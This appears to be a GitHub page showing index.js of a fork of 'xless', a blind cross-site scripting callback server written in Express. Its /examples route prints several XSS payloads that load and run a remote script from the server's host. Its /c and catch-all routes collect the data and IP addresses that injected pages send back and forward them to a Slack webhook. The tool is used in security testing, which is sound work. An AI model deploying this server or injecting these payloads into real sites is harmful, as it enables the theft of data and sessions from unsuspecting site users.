forked from mazen160/xless
-
Notifications
You must be signed in to change notification settings - Fork 0
/
index.js
99 lines (78 loc) · 2.9 KB
/
index.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
// Xless: The Serverlesss Blind XSS App.
// Version: v1.1
// Author: Mazin Ahmed <[email protected]>
const express = require("express");
var bodyParser = require("body-parser");
var cors = require("cors");
const process = require("process");
var request = require("request");
const port = process.env.PORT || 3000;
const app = express();
app.use(cors());
app.use(bodyParser.json());
app.use(function (req, res, next) {
// Headers
res.header("Powered-By", "XLESS");
res.header("Access-Control-Allow-Origin", "*");
res.header("Access-Control-Allow-Methods", "GET,POST");
res.header("Access-Control-Allow-Headers", "Content-Type");
next();
});
function generate_blind_xss_alert(body) {
var alert = "*XSSless: Blind XSS Alert*\n";
for( let k of Object.keys(body)) {
if (body[k] === "") {
alert += "*"+k+":* " + "```None```" + "\n"
} else {
alert += "*"+k+":* " + "```" + body[k] + "```" + "\n"
}
}
return(alert)
}
function generate_callback_alert(headers, data, url) {
var alert = "*XSSless: Out-of-Band Callback Alert*\n";
alert += `• *IP Address:* \`${data["Remote IP"]}\`\n`
alert += `• *User-Agent:* \`${headers["user-agent"]}\`\n`
alert += `• *Request URI:* \`${url}\`\n`
if (headers["Referrer"] !== undefined) {
alert += `• *Referrer:* \`${headers["referrer"]}\`\n`
}
return(alert)
}
app.get("/examples", (req, res) => {
res.header("Content-Type", "text/plain")
//var url = req.protocol + '://' + req.headers['host']
var url = 'https://' + req.headers['host']
var page = ""
page += `\'"><script src="${url}"></script>\n\n`
page += `javascript:eval('var a=document.createElement(\\'script\\');a.src=\\'${url}\\';document.body.appendChild(a)')\n\n`
page += `<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "${url}");a.send();</script>\n\n`
page += `<script>$.getScript("${url}")</script>`
res.send(page)
res.end()
})
app.post("/c", (req, res) => {
var data = req.body
data["Remote IP"] = req.headers["x-forwarded-for"] || req.connection.remoteAddress
const alert = generate_blind_xss_alert(data)
data = {form: {"payload": JSON.stringify({"username": "XLess", "mrkdwn": true, "text": alert}) }}
request.post(process.env.SLACK_INCOMING_WEBHOOK, data, (out) => {
res.send("ok\n")
res.end()
});
})
app.get("/*", (req, res) => {
var headers = req.headers
var data = req.body
data["Remote IP"] = req.headers["x-forwarded-for"] || req.connection.remoteAddress
const alert = generate_callback_alert(headers, data, req.url)
data = {form: {"payload": JSON.stringify({"username": "XLess", "mrkdwn": true, "text": alert}) }}
request.post(process.env.SLACK_INCOMING_WEBHOOK, data, (out) => {
res.send("ok\n")
res.end()
});
})
app.listen(port, err => {
if (err) throw err
console.log(`> Ready On Server http://localhost:${port}`)
})